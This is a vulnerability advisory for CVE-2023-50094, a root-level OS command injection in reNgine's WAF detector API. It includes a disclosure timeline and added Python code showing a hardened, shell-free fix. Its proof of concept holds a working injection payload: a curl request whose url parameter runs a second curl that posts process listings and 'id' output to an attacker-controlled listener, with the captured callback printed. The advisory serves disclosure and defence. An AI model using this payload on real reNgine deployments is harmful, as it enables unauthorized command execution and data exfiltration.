CVE-2023-50094 - OS Command Injection in reNgine


Description

An authenticated OS Command Injection vulnerability exists in multiple versions of reNgine including the latest release version v2.0.2. By sending a crafted URL to the server, arbitrary OS commands may be injected into subprocess.check_output and executed as the root user on the web service container.

Location

This vulnerability is present in the WAF Detect functionality of reNgine.

Endpoint: POST https://rengine/api/tools/waf_detector
Parameter: url

Proof of Concept

0x01. Authenticate to reNgine.

0x02. Start a callback listener: sudo nc -nvlp 80.

0x03. Execute the following curl command using the authenticated session cookie:

curl -k -b "sessionid=fykexm0q2eec5xrb8quu9r9talmin7nl" 'https://rengine/api/tools/waf_detector/?format=json&url=https://www.example.com;curl%20-X%20POST%20--data%20"$(ps%20-aux)"%20192.168.1.91/?`id`'

0x04. Receive the callback containing the output from executing id and ps -aux:

2023-12-28 12:00:46 CST:~$ netcat -nvlp 80
Connection from 192.168.1.131:32996
POST /?uid=0(root) HTTP/1.1
Host: 192.168.1.91
User-Agent: curl/7.81.0
Accept: */*
Content-Length: 637
Content-Type: application/x-www-form-urlencoded

USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0   4360  1920 ?        Ss   18:00   0:00 /bin/bash /usr/src/app/entrypoint.sh
root          33  0.1  0.3  77312 54268 ?        S    18:00   0:00 python3 manage.py runserver 0.0.0.0:8000
root          34  4.1  0.8 538428 137560 ?       Sl   18:00   0:11 /usr/bin/python3 manage.py runserver 0.0.0.0:8000
root         107  0.0  0.0   2888  1152 ?        S    18:05   0:00 /bin/sh -c wafw00f https://www.example.com;curl -X POST --data "$(ps -aux)" 192.168.1.91/?`id`
root         109  0.0  0.0   7436  2176 ?        R    18:05   0:00 ps -aux

Impact

An attacker with a valid session ID may execute arbitrary OS commands on the web service container of reNgine.
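The process listing above shows the root cause: the URL is interpolated into a shell command line (/bin/sh -c wafw00f <url>), so a ';' in the parameter ends the wafw00f invocation and starts a second command. The following is an added illustration, not reNgine's code, contrasting that pattern with a hardened version; the function names, the validation rules and the assumption that wafw00f prints its result to stdout are mine.

```python
# Added example (not reNgine's code): the shell-string pattern behind
# CVE-2023-50094 beside a hardened equivalent. Names are hypothetical.
import shlex
import subprocess
from urllib.parse import urlsplit

# The PoC payload from the advisory, reduced to its shape: the ';' ends the
# wafw00f command and starts a second one.
CRAFTED_URL = 'https://www.example.com;curl -X POST --data "$(ps -aux)" 192.168.1.91/?`id`'


def vulnerable_command(url: str) -> str:
    """String a shell=True check_output(...) call would hand to /bin/sh -c.
    Built only to show the flaw; never executed here."""
    return f"wafw00f {url}"


def quoted_command(url: str) -> str:
    """Weaker mitigation if a shell must be kept: shlex.quote makes the URL
    one shell word, so ';', backticks and $(...) lose their meaning."""
    return f"wafw00f {shlex.quote(url)}"


def validate_target_url(url: str) -> str:
    """Accepts only an absolute http(s) URL with a host name and none of the
    characters a shell or downstream tool could misinterpret."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("url must be an absolute http(s) URL")
    forbidden = set(";|&`$()<>\"'\\ \n\r")
    if any(ch in forbidden for ch in url):
        raise ValueError("url contains disallowed characters")
    return url


def is_safe_target_url(url: str) -> bool:
    try:
        validate_target_url(url)
        return True
    except ValueError:
        return False


def safe_argv(url: str) -> list:
    """Argument vector for shell=False: the URL is a single argv element,
    so no shell ever parses it."""
    return ["wafw00f", validate_target_url(url)]


def detect_waf(url: str, runner=subprocess.run) -> str:
    """Runs wafw00f without a shell. `runner` is injectable so the logic can
    be exercised without wafw00f installed (assumed to print to stdout)."""
    proc = runner(safe_argv(url), capture_output=True, text=True, timeout=60, check=False)
    return proc.stdout
```

Run with a real wafw00f on PATH, detect_waf("https://www.example.com") performs the scan; the crafted URL is rejected before any process is spawned.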

Recommended CVSSv3.1: https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N&version=3.1

Disclosure Timeline

  • February 12, 2023 - Initial disclosure to project maintainer via huntr.dev in accordance with the project’s policy (https://huntr.com/bounties/c046c9b7-f397-4650-af3f-fa0451548452/)
    • no response
  • March 23, 2023 - Updated disclosure showing proof of concept is still valid using master commit: e3dc06a4ee08c6a1c5fa7d84d7a0de4dac93315a
    • no response
  • November 30, 2023 - Applied for CVE ID
  • December 20, 2023 - Final attempt to contact maintainer
    • no response
  • December 28, 2023 - Public disclosure (current document)

References